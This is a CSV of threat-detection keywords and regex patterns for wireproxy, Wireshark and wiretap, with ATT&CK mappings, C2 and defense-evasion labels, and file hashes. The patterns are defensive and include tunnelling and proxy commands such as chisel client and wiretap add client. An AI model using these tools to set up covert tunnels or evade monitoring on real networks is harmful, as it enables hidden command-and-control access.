"*f18f551bbe47c5078c3e49718dea7287979b203fbd01149e9def64bbae723e4c*",".{0,1000}f18f551bbe47c5078c3e49718dea7287979b203fbd01149e9def64bbae723e4c.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z"
"*f5ebf3d481f604a7f5d301034f7868eb02bf07545dc2a3eccd755ca49356684f*",".{0,1000}f5ebf3d481f604a7f5d301034f7868eb02bf07545dc2a3eccd755ca49356684f.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z"
"*f650e73547f22ce8b7503d31f62d2f8426c5734e5b25074d08527e50f74b0bdb*",".{0,1000}f650e73547f22ce8b7503d31f62d2f8426c5734e5b25074d08527e50f74b0bdb.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z"
"*f71e8c4887a42cff058f46f270cc2c142ba2fdb4b714fd6c65e44a0ed09e2433*",".{0,1000}f71e8c4887a42cff058f46f270cc2c142ba2fdb4b714fd6c65e44a0ed09e2433.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z"
"*pufferffish/wireproxy*",".{0,1000}pufferffish\/wireproxy.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","1","N/A","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z"
"*wireproxy --*",".{0,1000}wireproxy\s\-\-.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","N/A","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z"
"*wireproxy -c *",".{0,1000}wireproxy\s\-c\s.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","N/A","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z"
"*wireproxy -n *",".{0,1000}wireproxy\s\-n\s.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","N/A","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z"
"*wireproxy -s*",".{0,1000}wireproxy\s\-s.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","N/A","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z"
"*bin/wireshark*",".{0,1000}bin\/wireshark.{0,1000}","greyware_tool_keyword","wireshark","Wireshark is a network protocol analyzer.","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://www.wireshark.org/","1","0","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
"*dl.wireshark.org*",".{0,1000}dl\.wireshark\.org.{0,1000}","greyware_tool_keyword","wireshark","Wireshark is a network protocol analyzer.","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://www.wireshark.org/","1","1","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
"*dumpcap -*",".{0,1000}dumpcap\s\-.{0,1000}","greyware_tool_keyword","wireshark","Wireshark is a network protocol analyzer.","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://www.wireshark.org/","1","0","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
"*install tshark*",".{0,1000}install\stshark.{0,1000}","greyware_tool_keyword","wireshark","Wireshark is a network protocol analyzer.","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://www.wireshark.org/","1","0","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
"*libwireshark16*",".{0,1000}libwireshark16.{0,1000}","greyware_tool_keyword","wireshark","Wireshark is a network protocol analyzer.","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://www.wireshark.org/","1","1","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
"*libwireshark-data*",".{0,1000}libwireshark\-data.{0,1000}","greyware_tool_keyword","wireshark","Wireshark is a network protocol analyzer.","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://www.wireshark.org/","1","1","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
"*libwireshark-dev*",".{0,1000}libwireshark\-dev.{0,1000}","greyware_tool_keyword","wireshark","Wireshark is a network protocol analyzer.","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://www.wireshark.org/","1","1","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
"*libwiretap13*",".{0,1000}libwiretap13.{0,1000}","greyware_tool_keyword","wireshark","Wireshark is a network protocol analyzer.","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://www.wireshark.org/","1","1","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
"*--no-promiscuous-mode*",".{0,1000}\-\-no\-promiscuous\-mode.{0,1000}","greyware_tool_keyword","wireshark","Wireshark is a network protocol analyzer.","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://www.wireshark.org/","1","0","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
"*sharkd -a tcp:*",".{0,1000}sharkd\s\-a\stcp\:.{0,1000}","greyware_tool_keyword","wireshark","Wireshark is a network protocol analyzer.","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://www.wireshark.org/","1","0","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
"*tshark *-i *",".{0,1000}tshark\s.{0,1000}\-i\s.{0,1000}","greyware_tool_keyword","wireshark","Wireshark is a network protocol analyzer.","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://www.wireshark.org/","1","0","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
"*tshark -f *",".{0,1000}tshark\s\-f\s.{0,1000}","greyware_tool_keyword","wireshark","Wireshark is a network protocol analyzer.","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://www.wireshark.org/","1","0","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
"*tshark -Q*",".{0,1000}tshark\s\-Q.{0,1000}","greyware_tool_keyword","wireshark","Wireshark is a network protocol analyzer.","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://www.wireshark.org/","1","0","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
"*tshark -r *",".{0,1000}tshark\s\-r\s.{0,1000}","greyware_tool_keyword","wireshark","Wireshark is a network protocol analyzer.","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://www.wireshark.org/","1","0","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
"*tshark*.deb*",".{0,1000}tshark.{0,1000}\.deb.{0,1000}","greyware_tool_keyword","wireshark","Wireshark is a network protocol analyzer.","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://www.wireshark.org/","1","1","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
"*Wireshark*",".{0,1000}Wireshark.{0,1000}","greyware_tool_keyword","wireshark","Wireshark is a network protocol analyzer.","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://www.wireshark.org/","1","1","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
"*wireshark*.deb*",".{0,1000}wireshark.{0,1000}\.deb.{0,1000}","greyware_tool_keyword","wireshark","Wireshark is a network protocol analyzer.","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://www.wireshark.org/","1","1","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
"*Wireshark*.dmg*",".{0,1000}Wireshark.{0,1000}\.dmg.{0,1000}","greyware_tool_keyword","wireshark","Wireshark is a network protocol analyzer.","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://www.wireshark.org/","1","1","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
"*wireshark-*.tar.xz*",".{0,1000}wireshark\-.{0,1000}\.tar\.xz.{0,1000}","greyware_tool_keyword","wireshark","Wireshark is a network protocol analyzer.","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://www.wireshark.org/","1","1","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
"*wireshark-common*",".{0,1000}wireshark\-common.{0,1000}","greyware_tool_keyword","wireshark","Wireshark is a network protocol analyzer.","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://www.wireshark.org/","1","1","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
"*wireshark-dev*",".{0,1000}wireshark\-dev.{0,1000}","greyware_tool_keyword","wireshark","Wireshark is a network protocol analyzer.","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://www.wireshark.org/","1","1","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
"*wireshark-gtk*",".{0,1000}wireshark\-gtk.{0,1000}","greyware_tool_keyword","wireshark","Wireshark is a network protocol analyzer.","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://www.wireshark.org/","1","1","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
"*WiresharkPortable64*",".{0,1000}WiresharkPortable64.{0,1000}","greyware_tool_keyword","wireshark","Wireshark is a network protocol analyzer.","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://www.wireshark.org/","1","1","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
"*wireshark-qt*",".{0,1000}wireshark\-qt.{0,1000}","greyware_tool_keyword","wireshark","Wireshark is a network protocol analyzer.","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://www.wireshark.org/","1","1","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
"*Wireshark-win*.exe*",".{0,1000}Wireshark\-win.{0,1000}\.exe.{0,1000}","greyware_tool_keyword","wireshark","Wireshark is a network protocol analyzer.","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://www.wireshark.org/","1","1","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
"* install wireguard*",".{0,1000}\sinstall\swireguard.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","Defense Evasion","https://github.com/sandialabs/wiretap","1","0","N/A","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z"
"* install wireguard-tools*",".{0,1000}\sinstall\swireguard\-tools.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","Defense Evasion","https://github.com/sandialabs/wiretap","1","0","N/A","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z"
"* pacman -S wireguard-tools*",".{0,1000}\spacman\s\-S\swireguard\-tools.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","Defense Evasion","https://github.com/sandialabs/wiretap","1","0","N/A","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z"
"* wireguard-installer.exe*",".{0,1000}\swireguard\-installer\.exe.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","Defense Evasion","https://github.com/sandialabs/wiretap","1","0","N/A","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z"
"* wiretap.exe*",".{0,1000}\swiretap\.exe.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","0","N/A","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z"
"*./chisel client *",".{0,1000}\.\/chisel\sclient\s.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","0","N/A","chisel","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z"
"*./wiretap remove*",".{0,1000}\.\/wiretap\sremove.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","0","N/A","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z"
"*/Wireguard.zip*",".{0,1000}\/Wireguard\.zip.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","Defense Evasion","https://github.com/sandialabs/wiretap","1","1","N/A","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z"
"*/wireguard-amd64-*.msi*",".{0,1000}\/wireguard\-amd64\-.{0,1000}\.msi.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","Defense Evasion","https://github.com/sandialabs/wiretap","1","1","N/A","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z"
"*/wireguard-installer.exe*",".{0,1000}\/wireguard\-installer\.exe.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","Defense Evasion","https://github.com/sandialabs/wiretap","1","1","N/A","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z"
"*/wireguard-installer.rar*",".{0,1000}\/wireguard\-installer\.rar.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","Defense Evasion","https://github.com/sandialabs/wiretap","1","1","N/A","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z"
"*/wiretap add client*",".{0,1000}\/wiretap\sadd\sclient.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","0","N/A","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z"
"*/wiretap.conf*",".{0,1000}\/wiretap\.conf.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","0","N/A","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z"
"*/wiretap.Dockerfile*",".{0,1000}\/wiretap\.Dockerfile.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","1","N/A","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z"
"*/wiretap.exe*",".{0,1000}\/wiretap\.exe.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","1","N/A","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z"
"*/wiretap.git*",".{0,1000}\/wiretap\.git.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","1","N/A","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z"
"*/wiretap.log*",".{0,1000}\/wiretap\.log.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","0","N/A","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z"
"*/wiretap/releases/download/*",".{0,1000}\/wiretap\/releases\/download\/.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","1","N/A","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z"
"*/wiretap_*_linux_386.tar.gz*",".{0,1000}\/wiretap_.{0,1000}_linux_386\.tar\.gz.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","1","N/A","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z"
"*/wiretap_*_linux_amd64.tar.gz*",".{0,1000}\/wiretap_.{0,1000}_linux_amd64\.tar\.gz.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","1","N/A","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z"
"*/wiretap_*_linux_arm64.tar.gz*",".{0,1000}\/wiretap_.{0,1000}_linux_arm64\.tar\.gz.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","1","N/A","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z"
"*/wiretap_*_linux_armv6.tar.gz*",".{0,1000}\/wiretap_.{0,1000}_linux_armv6\.tar\.gz.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","1","N/A","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z"
"*/wiretap_*_windows_386.tar.gz*",".{0,1000}\/wiretap_.{0,1000}_windows_386\.tar\.gz.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","1","N/A","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z"
"*/wiretap_*_windows_amd64.tar.gz*",".{0,1000}\/wiretap_.{0,1000}_windows_amd64\.tar\.gz.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","1","N/A","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z"
"*/wiretap_*_windows_arm64.tar.gz*",".{0,1000}\/wiretap_.{0,1000}_windows_arm64\.tar\.gz.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","1","N/A","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z"
"*/wiretap_*_windows_armv6.tar.gz*",".{0,1000}\/wiretap_.{0,1000}_windows_armv6\.tar\.gz.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","1","N/A","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z"
"*/wiretap_relay.conf*",".{0,1000}\/wiretap_relay\.conf.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","0","N/A","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z"
"*/wiretap_relay_1.conf*",".{0,1000}\/wiretap_relay_1\.conf.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","0","N/A","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z"
"*/wiretap_server.conf*",".{0,1000}\/wiretap_server\.conf.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","0","N/A","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z"
"*/wiretap_server_1.conf*",".{0,1000}\/wiretap_server_1\.conf.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","0","N/A","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z"
"*\WireGuard.lnk*",".{0,1000}\\WireGuard\.lnk.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","Defense Evasion","https://github.com/sandialabs/wiretap","1","0","N/A","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z"
"*\Wireguard.zip*",".{0,1000}\\Wireguard\.zip.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","Defense Evasion","https://github.com/sandialabs/wiretap","1","0","N/A","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z"
"*\wireguard-installer.exe*",".{0,1000}\\wireguard\-installer\.exe.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","Defense Evasion","https://github.com/sandialabs/wiretap","1","0","N/A","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z"
"*\wireguard-installer.rar*",".{0,1000}\\wireguard\-installer\.rar.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","Defense Evasion","https://github.com/sandialabs/wiretap","1","0","N/A","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z"
"*\wiretap.exe*",".{0,1000}\\wiretap\.exe.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","0","N/A","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z"
"*\wiretap.log*",".{0,1000}\\wiretap\.log.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","0","N/A","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z"
"*<Data Name='Product'>WireGuard*",".{0,1000}\<Data\sName\=\'Product\'\>WireGuard.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","Defense Evasion","https://github.com/sandialabs/wiretap","1","0","N/A","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z"
"*>WireGuard Relay<*",".{0,1000}\>WireGuard\sRelay\<.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","0","N/A","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z"
"*>WireGuard Tunnel<*",".{0,1000}\>WireGuard\sTunnel\<.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","0","N/A","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z"
"*>wireguard-installer<*",".{0,1000}\>wireguard\-installer\<.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","Defense Evasion","https://github.com/sandialabs/wiretap","1","0","N/A","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z"
"*0164502183613e987753f77bf9a45bde5a08f9332cf2d119cbfbf284cae64a25*",".{0,1000}0164502183613e987753f77bf9a45bde5a08f9332cf2d119cbfbf284cae64a25.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","0","#filehash","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z"
